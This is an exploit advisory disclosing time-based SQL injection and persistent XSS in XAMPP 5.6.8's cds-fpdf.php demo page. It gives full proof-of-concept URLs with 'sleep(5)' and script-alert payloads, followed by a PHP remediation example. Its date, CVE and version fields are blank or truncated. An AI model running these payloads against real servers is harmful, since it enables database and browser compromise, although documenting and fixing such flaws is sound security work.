[EXP]XAMPP 5.6.8 - SQL Injection / Persistent Cross-Site Scripting
<!--
# Exploit Title: SQL injection in XAMPP 5.6. (and previous)
# Date: --
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/5.6.8/
# Software Link: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/5.6.8/
# Version: XAMPP 5.6.
# Tested on: All
# CVE : CVE--
# Category: webapps

Description

XAMPP through 5.6. allows SQL injection via the cds-fpdf.php jahr parameter. NOTE: This product is discontinued.

Affected Product Code Base

XAMPP 1.8. (and previous).

Proof of Concept

http://localhost/xampp/cds-fpdf.php?interpret=SQLi&titel=SQLi&jahr=1984%20%20AND%20sleep%285%29

Solution:

The product is discontinued. Update to the latest version.

Reference:
https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/1.8.2/
https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/5.5.19/
https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/5.6.8/
-->

<!--
# Exploit Title: Cross Site Scripting in XAMPP 5.6. (and previous)
# Date: --
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/5.6.8/
# Software Link: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/5.6.8/
# Version: XAMPP 5.6.
# Tested on: All
# CVE : CVE--
# Category: webapps

Description

XAMPP through 5.6. allows XSS via the cds-fpdf.php interpret or titel parameter. NOTE: This product is discontinued.

Affected Product Code Base

XAMPP 1.8. (and previous).

Proof of Concept

First request (the characters in the content are not filtered):

http://X.X.X.X/xampp/cds.php?interpret=<script>alert("XSS")</script>&titel=XSS&jahr=1984

or:

http://localhost/xampp/cds.php?interpret=XSS&titel=<script>alert("XSS")</script>&jahr=1984

Second request (triggers the XSS):

http://X.X.X.X/xampp/cds-fpdf.php
http://localhost/xampp/cds-fpdf.php?interpret=XSS&titel=<script>alert("XSS")</script>&jahr=1984
http://localhost/xampp/cds-fpdf.php?interpret=<script>alert("XSS")</script>&titel=XSS&jahr=1984

When cds-fpdf.php is loaded, it does not filter the characters:

<b><script>alert("XSS")</script></b></td><td class=tabval>

cds.php filters them:

<td class=tabval><b><script>alert("XSS"</script></b></td><td class=tabval>

Solution:

The product is discontinued. Update to the latest version.

Reference:
https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/1.8.2/
https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/5.5.19/
https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/5.6.8/ -->
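
The two findings above share one remediation pattern, shown here as an added example that is not XAMPP's own code: `jahr` sits in a numeric SQL context, so it must be validated as an integer and bound as a parameter, and stored `interpret`/`titel` values must be HTML-encoded by every page that renders them. The table name `cds`, its columns, the function names and the use of in-memory SQLite in place of MySQL are assumptions made for illustration.

```php
<?php
// Added example, not XAMPP's code. Table "cds" and its columns are assumptions;
// in-memory SQLite stands in for MySQL so the script runs offline.

function open_db(): PDO {
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE cds (id INTEGER PRIMARY KEY, titel TEXT, interpret TEXT, jahr INTEGER)');
    return $pdo;
}

// jahr lands in a numeric SQL context, so quote-escaping alone cannot protect it:
// accept only a plain integer in a sane range and reject everything else.
function parse_jahr(string $raw): ?int {
    $v = filter_var($raw, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1000, 'max_range' => 9999]]);
    return $v === false ? null : $v;
}

// Store the record with bound parameters; returns false when jahr is rejected.
function add_cd(PDO $pdo, string $interpret, string $titel, string $jahr): bool {
    $year = parse_jahr($jahr);
    if ($year === null) {
        return false;
    }
    $stmt = $pdo->prepare('INSERT INTO cds (titel, interpret, jahr) VALUES (?, ?, ?)');
    $stmt->bindValue(1, $titel);
    $stmt->bindValue(2, $interpret);
    $stmt->bindValue(3, $year, PDO::PARAM_INT);
    return $stmt->execute();
}

// Encode at output time on every page that renders stored values,
// not only on the page that accepted them.
function render_rows(PDO $pdo): string {
    $html = '';
    foreach ($pdo->query('SELECT interpret, titel, jahr FROM cds ORDER BY id') as $row) {
        $html .= '<tr><td class="tabval"><b>'
            . htmlspecialchars($row['interpret'], ENT_QUOTES, 'UTF-8') . '</b></td>'
            . '<td class="tabval">' . htmlspecialchars($row['titel'], ENT_QUOTES, 'UTF-8') . '</td>'
            . '<td class="tabval">' . (int)$row['jahr'] . "</td></tr>\n";
    }
    return $html;
}

// Constructed inputs modelled on the parameter values shown in the advisory.
$pdo = open_db();
var_dump(add_cd($pdo, 'SQLi', 'SQLi', '1984  AND sleep(5)'));
var_dump(add_cd($pdo, 'XSS', '<script>alert("XSS")</script>', '1984'));
echo render_rows($pdo);
```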